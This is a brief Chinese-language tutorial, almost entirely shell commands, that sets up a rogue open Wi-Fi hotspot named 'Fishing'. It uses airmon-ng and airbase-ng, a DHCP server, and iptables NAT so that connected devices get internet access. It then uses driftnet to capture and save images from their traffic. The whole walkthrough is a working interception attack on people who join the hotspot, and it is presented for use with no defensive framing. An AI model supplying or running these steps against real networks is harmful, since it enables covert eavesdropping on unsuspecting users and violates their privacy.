首先写dhcp配置文件/etc/dhcp/dhcpd.conf
authoritative; default-lease-time 700; max-lease-time 8000; subnet 10.0.0.0 netmask 255.255.255.0 { option routers 10.0.0.1; option subnet-mask 255.255.255.0; option domain-name-servers 10.0.0.1; range 10.0.0.10 10.0.0.100; }这里以10.0.0.1作为网关和dns服务器地址。
然后我们处理无线网卡
ifconfig wlan0 down #wlan0为本机网卡的名称 iwconfig wlan0 mode monitor ifconfig wlan0 up airmon-ng start wlan0然后用airbase建立热点
airbase-ng -e Fishing -c 11 wlan0热点的网络流量会被虚拟到at0这块网卡上面
ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1打开ip转发
echo 1 > /proc/sys/net/ipv4/ip_forward开启dhcp
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhclient-wlan0.pid at0 #也可能是其他名称 service isc-dhcp-server start此时wifi可以连接,但是无法上网
配置NAT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面 iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356 #修改最大报文段长度注意那第三个命令调整MSS,不加后果很严重
至此热点建立结束
图片嗅探 driftnet -i at0 #小窗口显示嗅探到的图片 driftnet -i at0 -a #保存嗅探到的图片
